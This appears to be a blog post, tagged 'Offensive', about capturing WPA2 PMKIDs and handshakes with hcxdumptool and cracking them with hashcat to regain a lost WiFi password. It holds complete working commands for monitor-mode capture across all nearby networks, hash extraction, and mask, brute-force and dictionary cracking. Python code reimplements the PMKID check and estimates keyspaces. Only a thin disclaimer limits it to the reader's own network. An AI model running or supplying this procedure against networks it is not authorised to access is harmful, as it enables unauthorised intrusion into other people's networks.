Offensive

WiFi Access Retrieval

Recently I was clumsy enough to lose the password of the shared WiFi. Unfortunately, as I had no means to retrieve it and no access to the router, I had to get back into it differently.

Disclaimer: You can use this knowledge for good things or bad things. In this blog post, we are speaking about retrieving access to your network. If you decide to use that knowledge for other purposes, this is merely your decision.

Today we are going to see how to access a WiFi network when you have lost its password. It is one way among many. This one worked well because the initial data is quick to obtain before trying to brute force the password.

For this article we are going to need:

Introduction

We use two tools, hcxdumptool and hashcat. The first listens to the network and captures packets. From these packets we extract hashed data, and hashcat then helps us brute force that hashed data.

The first way to obtain this data is to listen to a client authenticating to the router. The authentication is a four-message handshake whose structure is known.

An alternative way is an optional field, the RSN (Robust Security Network) PMKID.

The PMKID (Pairwise Master Key Identifier) is a hash of the PMK (Pairwise Master Key), and this PMKID is the value we want to capture.

In both cases, a hash cannot be reversed. Instead, we brute force candidate passwords until one produces the same hash. When the two hashes match, we have found the password and can get back onto the network.

We do not try the candidates against the router: the brute force runs locally, so the router is not affected by it.

Installation

I am in the habit of keeping the source code of software I want to work with, and that the system does not need in order to run, in the /opt/ folder. Feel free to do the following operations in another folder, such as your home folder, if you prefer.

```sh
# Move into the folder you want to keep the sources in.
cd /opt/

# Let's retrieve the source code of the tools we need.
git clone https://github.com/ZerBea/hcxdumptool
git clone https://github.com/hashcat/hashcat
git clone https://github.com/ZerBea/hcxtools.git

# Let's build them and install them.
(cd hcxdumptool/ && make && sudo make install)
(cd hashcat/ && make && sudo make install)
(cd hcxtools/ && make && sudo make install)
```

Congratulations, you are now equipped to try to access any WiFi network, but of course we are only ever going to use it on the network that we own.

Preparing the network interface

We need to prepare the network interface so that it can monitor the network and be used by hcxdumptool.

During this phase you will lose internet access. This blog is a PWA and its content should stay accessible offline, so if you get lost, come back here!

First, let's find your WiFi interface:

```shell
ifconfig | grep wl
wlp1s0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
```

Here we can see that the interface is named wlp1s0.

We need to know whether other software is going to interfere. To find out, just run hcxdumptool on the interface:

```shell
sudo hcxdumptool -i wlp1s0
```

If you see lines similar to:

```shell
initialization...
warning: NetworkManager is running with pid 19085
warning: wpa_supplicant is running with pid 19012
```

you need to stop those services; in my case:

```shell
sudo service wpa_supplicant stop
sudo service NetworkManager stop
```

Now we are going to put it in monitor mode.

```shell
# Set the interface down, switch it to monitor mode, bring it back up
sudo ip link set wlp1s0 down
sudo iwconfig wlp1s0 mode monitor
sudo ip link set wlp1s0 up
```

From now on you should no longer have internet. If at any moment you wish to stop the procedure and restore the card to its normal state without rebooting, simply run:

```shell
sudo ip link set wlp1s0 down
sudo iwconfig wlp1s0 mode managed
sudo ip link set wlp1s0 up
sudo service wpa_supplicant start
sudo service NetworkManager start
```

Getting the password

Now we are going to capture the packets we need and then run the brute force. These operations leave some files behind, so I recommend moving to the /tmp/ folder.

```shell
cd /tmp/
```

Let's capture packets. It is possible to filter what we listen to, but in our case we are going to listen on all channels and do the filtering later.

If you know which channel to listen to, you can specify it with the -c option.

If you want to look at the networks around you and their channels, you can run:

```shell
sudo hcxdumptool -i wlp1s0 --do_rcascan
```

```shell
# Full spectrum
sudo hcxdumptool -o capture.pcapng -i wlp1s0

# Knowing the network is on channel 10
sudo hcxdumptool -o capture.pcapng -i wlp1s0 -c 10
```

You should see something like:

```
initialization...

start capturing (stop with ctrl+c)
INTERFACE................: wlp1s0
ERRORMAX.................: 100 errors
FILTERLIST...............: 0 entries
MAC CLIENT...............: e8041029998e
MAC ACCESS POINT.........: 000eef9848db (incremented on every new client)
EAPOL TIMEOUT............: 150000
REPLAYCOUNT..............: 64629
ANONCE...................: 5128b8228c2be3c383be6615f4b81f01d168bda5389f3b74329c97cf1fa6baef

INFO: cha=11, rx=2642, rx(dropped)=1533, tx=245, powned=3, err=0
```

Here the important information is the powned=3 value. It means that 3 networks are susceptible to this technique.

Let's have a cup of tea for the next 10 minutes, then press ctrl+c to stop the capture.

Once done, we extract from the capture the hashed data we can use to crack the password.

```shell
sudo hcxpcaptool capture.pcapng -z capture.16800 -o capture.2500 --network-out=network_hash_name
```

The -z option extracts the PMKIDs and the -o option extracts the handshake authentications.

This produces three files: capture.16800, capture.2500 and network_hash_name.

To know whether the network you want to recover the password for is vulnerable, there are two steps.

First, check whether the name of the network appears in the capture.2500 file:

```shell
wlanhcxinfo -i capture.2500 -a -s -e | grep -a <name of the network>
```

The second step, if you did not find your network yet, is to cat network_hash_name and match the corresponding hash against the capture.16800 file.

For example:

```shell
cat network_hash_name
```

A list of the form hash:network name will appear. If the hash corresponding to your network is in capture.16800, it means that you will be able to attack it.

The easiest way to check without damaging your precious eyes:

```shell
cat capture.16800 | grep <hash>
```

If it is there, congratulations: let's run the brute force and flex our GPUs. If not, the PMKID method is probably not possible, and the only solution is to run hcxdumptool longer and wait for someone to connect to the access point.
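To make the two checks above concrete (what a capture.16800 line contains, and what "the two hashes match" in the introduction actually means), here is an added Python example; it is not code from the post or from hcxtools/hashcat. It parses the hashcat 16800 line format (PMKID, access point MAC, client MAC and ESSID, hex-encoded and separated by `*`), looks up a network by name the way the `cat`/`grep` step does, and then performs the per-candidate check that hashcat mode 16800 runs: derive the PMK from the candidate passphrase with PBKDF2-HMAC-SHA1 (the ESSID is the salt, 4096 iterations), compute the PMKID as HMAC-SHA1-128 over "PMK Name" and the two MACs, and compare. The sample lines, ESSID, MAC addresses and passphrase are all constructed for the example; the only realistic use of the line builder is reproducing the line for a network whose passphrase you already know, such as your own, to confirm the capture is readable.

```python
import hashlib
import hmac

# WPA2-PSK derivation as published in IEEE 802.11i:
#   PMK   = PBKDF2-HMAC-SHA1(passphrase, ESSID, 4096 iterations, 32 bytes)
#   PMKID = HMAC-SHA1-128(PMK, "PMK Name" || MAC_AP || MAC_STA)
# The PMKID is what hcxdumptool captures and what hashcat mode 16800 tests candidates against.

def derive_pmk(passphrase: str, essid: str) -> bytes:
    """Passphrase -> PMK. The ESSID is the salt, so one passphrase gives a different PMK per network."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"), essid.encode("utf-8"), 4096, 32)

def derive_pmkid(pmk: bytes, mac_ap: bytes, mac_sta: bytes) -> bytes:
    """PMK -> 16-byte PMKID for one access point / client pair."""
    return hmac.new(pmk, b"PMK Name" + mac_ap + mac_sta, hashlib.sha1).digest()[:16]

def parse_16800_line(line: str) -> dict:
    """Parse one hashcat 16800 line: PMKID*MAC_AP*MAC_STA*ESSID (all hex, '*'-separated)."""
    pmkid_hex, ap_hex, sta_hex, essid_hex = line.strip().split("*")
    return {
        "pmkid": bytes.fromhex(pmkid_hex),
        "mac_ap": bytes.fromhex(ap_hex),
        "mac_sta": bytes.fromhex(sta_hex),
        "essid": bytes.fromhex(essid_hex).decode("utf-8", errors="replace"),
    }

def find_network(lines, essid: str):
    """Return the parsed 16800 entry for `essid`, or None if no PMKID was captured for it."""
    for line in lines:
        if not line.strip():
            continue
        entry = parse_16800_line(line)
        if entry["essid"] == essid:
            return entry
    return None

def passphrase_matches(entry: dict, candidate: str) -> bool:
    """True when `candidate` derives the captured PMKID: the check hashcat runs for every candidate."""
    pmk = derive_pmk(candidate, entry["essid"])
    computed = derive_pmkid(pmk, entry["mac_ap"], entry["mac_sta"])
    return hmac.compare_digest(computed, entry["pmkid"])

# --- Constructed sample data (not from a real capture) ---
SAMPLE_ESSID = "HomeNet-Example"
SAMPLE_PASSPHRASE = "correct horse battery"     # constructed; a real one is 8 to 63 characters
SAMPLE_MAC_AP = bytes.fromhex("020000000001")   # locally administered, constructed addresses
SAMPLE_MAC_STA = bytes.fromhex("020000000002")

def make_16800_line(essid: str, passphrase: str, mac_ap: bytes, mac_sta: bytes) -> str:
    """Build the 16800 line for a network whose passphrase we already know (e.g. our own)."""
    pmkid = derive_pmkid(derive_pmk(passphrase, essid), mac_ap, mac_sta)
    return "*".join([pmkid.hex(), mac_ap.hex(), mac_sta.hex(), essid.encode("utf-8").hex()])

# Two lines as capture.16800 would hold them: a neighbour whose PMKID is an arbitrary
# constructed value, and our own network, whose line we can reproduce exactly.
SAMPLE_16800 = [
    "00112233445566778899aabbccddeeff*020000000003*020000000004*" + "OtherNet".encode().hex(),
    make_16800_line(SAMPLE_ESSID, SAMPLE_PASSPHRASE, SAMPLE_MAC_AP, SAMPLE_MAC_STA),
]

if __name__ == "__main__":
    entry = find_network(SAMPLE_16800, SAMPLE_ESSID)
    print("PMKID captured for", SAMPLE_ESSID, ":", entry is not None)
    print("wrong passphrase matches:", passphrase_matches(entry, "password123"))
    print("right passphrase matches:", passphrase_matches(entry, SAMPLE_PASSPHRASE))
```

Two things worth noticing in the code: the ESSID salt means a candidate list has to be re-hashed for every network, and the 4096 PBKDF2 iterations are what make each candidate cost so much more than a plain SHA-1, which is why the hash rates later in this post are in the thousands per second rather than billions.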

If, like me, you have an Android phone with the WiFi password saved (but you cannot read it back, thank you Android), you can connect with it, which speeds up the process significantly.

Unfortunately I only have a laptop with an Intel GPU, so the process is slow. Intel GPUs and OpenCL also have their troubles, and if you are in the same situation you will have to disable some of hashcat's safety checks (hence the --force flag in the commands below). Sounds fun, doesn't it?

WARNING: If you receive a message about the self-test failing with an Intel GPU/CPU, you need to install the Intel OpenCL runtime. Don't try to disable the self-test; it will not return any result in the end.

To install the Intel compute runtime, here are the instructions you can find on their page:

```shell
mkdir neo
cd neo
wget https://github.com/intel/compute-runtime/releases/download/19.29.13530/intel-gmmlib_19.2.3_amd64.deb
wget https://github.com/intel/compute-runtime/releases/download/19.29.13530/intel-igc-core_1.0.10-2306_amd64.deb
wget https://github.com/intel/compute-runtime/releases/download/19.29.13530/intel-igc-opencl_1.0.10-2306_amd64.deb
wget https://github.com/intel/compute-runtime/releases/download/19.29.13530/intel-opencl_19.29.13530_amd64.deb
wget https://github.com/intel/compute-runtime/releases/download/19.29.13530/intel-ocloc_19.29.13530_amd64.deb
sudo dpkg -i *.deb
```

In my specific case, I recalled the start of the password, so I used a brute force approach trying digits after ibiza131...

Now, based on which file contains your network:

```shell
# 2500
hashcat -m 2500 -a 3 capture.2500 ibiza131?d?d?d --force --increment

# 16800
hashcat -m 16800 -a 3 capture.16800 ibiza131?d?d?d --force --increment
```

Here ?d stands for a digit, and --increment means hashcat will try increasing lengths, adding one extra character after exhausting the previous possibilities.
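To see what a mask like `ibiza131?d?d?d` with `--increment` actually costs, and why the pure `?a` brute force used later in this post is a different proposition, here is an added Python keyspace estimator; it is not part of the post or of hashcat. The charset sizes are hashcat's built-ins (?d 10, ?l and ?u 26, ?s 33, ?a 95, ?b 256). With `--increment` the mask is also tried truncated to each shorter length; the estimate skips truncations shorter than 8 characters because WPA passphrases are at least that long (an assumption about how to count, not a model of hashcat's own guess-queue numbering). The 5435 H/s rate is the Speed.#1 figure from the hashcat status output shown further down.

```python
# hashcat's built-in charsets and how many characters each one covers
CHARSET_SIZE = {"l": 26, "u": 26, "d": 10, "s": 33, "a": 95, "b": 256}

def parse_mask(mask: str) -> list:
    """Split a hashcat mask into positions: (label, number of possible characters)."""
    positions = []
    i = 0
    while i < len(mask):
        if mask[i] == "?" and i + 1 < len(mask):
            token = mask[i + 1]
            if token == "?":
                positions.append(("?", 1))                  # "??" is a literal question mark
            elif token in CHARSET_SIZE:
                positions.append(("?" + token, CHARSET_SIZE[token]))
            else:
                raise ValueError(f"unknown charset ?{token}")
            i += 2
        else:
            positions.append((mask[i], 1))                  # literal character: exactly one choice
            i += 1
    return positions

def keyspace(mask: str, increment: bool = False, min_len: int = 8) -> int:
    """Number of candidates the mask yields.

    With increment=True the mask is also tried truncated to every shorter length (hashcat's
    --increment). Lengths below min_len are skipped: a WPA passphrase has at least 8 characters.
    Assumption: this counts candidates only; hashcat's guess-queue bookkeeping is not modelled.
    """
    positions = parse_mask(mask)
    if increment:
        lengths = range(min_len, len(positions) + 1)
    else:
        lengths = [len(positions)] if len(positions) >= min_len else []
    total = 0
    for length in lengths:
        count = 1
        for _, size in positions[:length]:
            count *= size
        total += count
    return total

def estimate_seconds(mask: str, rate_hs: float, increment: bool = False) -> float:
    """Worst-case time to exhaust the mask at a given hash rate (hashes per second)."""
    return keyspace(mask, increment) / rate_hs

def human(seconds: float) -> str:
    """Render a duration in the largest sensible unit."""
    for unit, size in (("years", 365 * 86400), ("days", 86400), ("hours", 3600), ("minutes", 60)):
        if seconds >= size:
            return f"{seconds / size:,.1f} {unit}"
    return f"{seconds:.1f} seconds"

if __name__ == "__main__":
    RATE = 5435  # H/s: the Speed.#1 figure from the hashcat status in this post (an Intel GPU)
    for mask, inc in (("ibiza131?d?d?d", True), ("?d" * 8, False), ("?a" * 8, False), ("?a" * 15, True)):
        n = keyspace(mask, inc)
        print(f"{mask:32} increment={inc!s:5} candidates={n:e} worst case {human(n / RATE)}")
```

The numbers make the defensive lesson plain: knowing all but three digits of the passphrase leaves 1111 candidates, a fraction of a second even on the slow GPU in this post, while a random 8-character `?a` passphrase is already years at that rate, and the 15-character `?a` mask used later is out of reach of any brute force. Passphrase length and randomness, not the secrecy of the capture, are what protect a WPA2-PSK network.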

You will see something resembling:

```shell
Session..........: hashcat
Status...........: Exhausted
Hash.Name........: WPA-EAPOL-PBKDF2
Hash.Target......: capture.2500
Time.Started.....: Tue Jul 30 01:05:07 2019 (18 secs)
Time.Estimated...: Tue Jul 30 01:05:25 2019 (0 secs)
Guess.Mask.......: ibiza131?d?d?d?d?d [13]
Guess.Queue......: 6/7 (85.71%)
Speed.#1.........: 5435 H/s (0.29ms) @ Accel:16 Loops:4 Thr:256 Vec:1
Recovered........: 1/2 (50.00%) Digests, 1/2 (50.00%) Salts
Progress.........: 200000/200000 (100.00%)
Rejected.........: 0/200000 (0.00%)
Restore.Point....: 100000/100000 (100.00%)
Restore.Sub.#1...: Salt:1 Amplifier:0-1 Iteration:0-1
Candidates.#1....: ibiza13134373 -> ibiza13173737
```

Here you can see that we have recovered at least one.

You can check the value in the hashcat potfile:

```shell
cat ~/.hashcat/hashcat.potfile
```

If I had not recalled the password at all, I could have done a pure brute force of the type:

```shell
# 2500
hashcat -m 2500 -a 3 capture.2500 ?a?a?a?a?a?a?a?a?a?a?a?a?a?a?a --force --increment

# 16800
hashcat -m 16800 -a 3 capture.16800 ?a?a?a?a?a?a?a?a?a?a?a?a?a?a?a --force --increment
```

In this case you can also do a dictionary attack:

```shell
# 2500
hashcat -m 2500 -a 0 capture.2500 --force my_list_of_passwords

# 16800
hashcat -m 16800 -a 0 capture.16800 --force my_list_of_passwords
```

You can find many lists of passwords here.

Okay that's all folks. Now that I got back internet I can post this article. Peace out!

By PXke, 28/07/2019. Tags: Offensive, WiFi, Retrieval. Updated: 28/07/2019